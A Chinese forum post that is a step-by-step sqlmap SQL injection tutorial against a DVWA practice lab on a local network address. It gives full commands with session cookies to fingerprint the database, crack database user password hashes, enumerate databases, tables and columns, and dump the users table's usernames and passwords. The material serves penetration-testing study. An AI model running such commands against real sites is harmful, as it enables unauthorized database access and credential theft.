找回密码
 立即注册

QQ登录

只需一步,快速开始

t01a9de762de23d1176.jpg

SQLmap数据库注入实战
实战1:枚举登录MYSQL数据的用户名与密码
实战2:枚举所有数据库
实战3:枚举指定数据库的数据表
实战4:获取指定数据库和表中所有列的信息
实战5:枚举指定数据表中的所有用户名与密码
环境准备:
1)登录http://192.168.1.124/DVWA-1.9,将安全级别设置为最低;
2)按下F12,在请求头部分获取cookies值。或者开启Firefox浏览器TamperData插件,等待获取cookies值;
3)在【SQL Injection】项中,提交User ID为22(地址栏出现id=22,这就是MySQL的注入点)
4)TamperData弹窗获取cookies值:security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552
t018870dd881aa6c4af.jpg

t01b84b752f5245b67b.jpg

实战1:枚举登录MYSQL数据的用户名与密码
sqlmap语法参数:
  • -u :指定目标URL,即注入点
  • --cookies:当前会话的cookies值
  • -b:获取数据库类型,检索数据库管理系统标识
  • --current-db:获取当前数据库
  • --current-user:获取当前登录数据库使用的用户
命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' -b --current-db --current-user
说明:根据提示回复Y,继续
t016bad090105a3714c.jpg

结果:得到当前数据库为dawa,使用的用户为root@localhost
t018304bd22fbbf14d9.jpg

实战2:枚举所有数据库
sqlmap语法参数:
  • --users:枚举数据库用户名
  • -password:枚举数据库用户的密码(hash)
命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --users --password
t0194ab6bfd3d3fb823.jpg

说明:选择目录下字典文件,暴力破解
t01592187549ad0d122.jpg

结果:数据库用户名为root,密码也有明文形式123456
t0148f9126faa4b11a4.jpg

实战3:枚举数据库和指定数据库的数据表
sqlmap语法参数:
  • --dbs:枚举当前数据库
命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --dbs
结果:mysql下所有的数据库











命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa --tables
结果:dvwa库中,所有的表
t01fba3a5b18de8e1b4.jpg

注:学习SqlMap数据库注入与DVWA渗透测试环境搭建视频课程,可参看以下专栏!

实战4:获取指定数据库和表中所有列的信息
sqlmap语法参数:
  • -D:指定的数据库
  • -T:指定数据库中的数据表
  • --columns:获取列的信息
命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users --columns
结果:dvwa库,users表中所有字段信息
t01516ee3e3cf2ad66c.jpg

实战5:枚举指定数据表中的所有用户名与密码
sqlmap语法参数:
  • -C:枚举数据表中的列
  • --dump:存储数据表项
命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users -C user,password --dump
结果:dvwa库,users表中user字段和password字段信息,最后表中信息转存文件中
t016c91c643dfc0c2b4.jpg


分享至 : QQ空间
收藏

0 个回复

您需要登录后才可以回帖 登录 | 立即注册